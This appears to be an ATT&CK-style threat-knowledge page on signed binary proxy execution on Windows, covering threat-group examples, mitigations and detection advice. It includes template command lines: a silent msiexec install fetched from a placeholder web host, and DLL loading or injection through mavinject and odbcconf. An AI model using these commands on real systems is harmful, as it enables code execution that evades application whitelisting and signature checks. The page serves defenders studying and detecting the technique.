Signed Binary Proxy Execution

Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.

Msiexec.exe

Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.[1][2][3] Msiexec.exe may also be used to execute DLLs.[1]

  • msiexec.exe /q /i "C:\path\to\file.msi"
  • msiexec.exe /q /i http[:]//site[.]com/file.msi
  • msiexec.exe /y "C:\path\to\file.dll"

Mavinject.exe

Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. [4]

  • "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL>
  • C:\Windows\system32\mavinject.exe <PID> /INJECTRUNNING <PATH DLL>

SyncAppvPublishingServer.exe

SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. [5]

Odbcconf.exe

Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.[6] The utility can be misused to execute functionality equivalent to Regsvr32 with the REGSVR option to execute a DLL.[7][8][9]

  • odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}

Several other binaries exist that may be used to perform similar behavior. [10]

ID: T1218
Tactic: Defense Evasion, Execution
Platform: Windows
Permissions Required: User
Data Sources: Process monitoring, Process command-line parameters
Defense Bypassed: Application whitelisting, Digital Certificate Validation
Contributors: Nishan Maharjan, @loki248; Hans Christoffer Gaardløs; Praetorian
Version: 2.0

Procedure Examples

Name Description
Cobalt Group

Cobalt Group has used odbcconf to proxy the execution of malicious DLL files.[9]

Duqu

Duqu has used msiexec to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages.[11]

Rancor

Rancor has used msiexec to download and execute malicious installer files over HTTP.[2]

TA505

TA505 has used msiexec to download and execute malicious Windows Installer files.[12][13]

Mitigations

Mitigation Description
Execution Prevention

Certain signed binaries that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these binaries if they are not required for a given system or network to prevent potential misuse by adversaries.

Privileged Account Management

If these binaries are required for use, then restrict execution of them to privileged accounts or groups that need to use them to lessen the opportunities for malicious use.

Detection

Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.

References